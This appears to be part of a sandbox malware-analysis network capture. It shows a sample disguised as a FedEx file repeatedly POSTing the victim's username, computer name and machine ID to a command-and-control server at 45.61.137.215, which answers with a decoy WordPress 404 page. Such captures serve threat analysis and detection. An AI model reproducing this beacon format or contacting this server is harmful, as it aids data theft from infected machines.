                May 22, 2024 22:02:10.796333075 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:02:13.850891113 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:02:11 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:02:13.851608038 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:02:13.853466988 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:02:13.855431080 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:02:13.855468035 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                May 22, 2024 22:02:13.859215021 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                May 22, 2024 22:02:13.861181974 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                May 22, 2024 22:02:13.861219883 CEST108INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                May 22, 2024 22:02:13.861251116 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                May 22, 2024 22:02:13.865400076 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                10192.168.2.74972145.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:02:14.011874914 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:02:14.060195923 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:02:17.059880972 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:02:14 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:02:17.061578035 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:02:17.071180105 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:02:17.071217060 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:02:17.075782061 CEST1236INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                May 22, 2024 22:02:17.077606916 CEST1236INData Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29
                Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
                May 22, 2024 22:02:17.077645063 CEST1236INData Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61
                Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
                May 22, 2024 22:02:17.077675104 CEST108INData Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f
                Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
                May 22, 2024 22:02:17.086023092 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                May 22, 2024 22:02:17.089601994 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                11192.168.2.74972245.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:02:17.236236095 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:02:17.288542986 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:02:20.032953024 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:02:17 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:02:20.035662889 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:02:20.042170048 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:02:20.042187929 CEST672INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:02:20.054045916 CEST1236INData Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d
                Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
                May 22, 2024 22:02:20.054059982 CEST224INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a
                Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
                May 22, 2024 22:02:20.054068089 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                May 22, 2024 22:02:20.066384077 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                May 22, 2024 22:02:20.066418886 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                May 22, 2024 22:02:20.069421053 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                12192.168.2.74972345.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
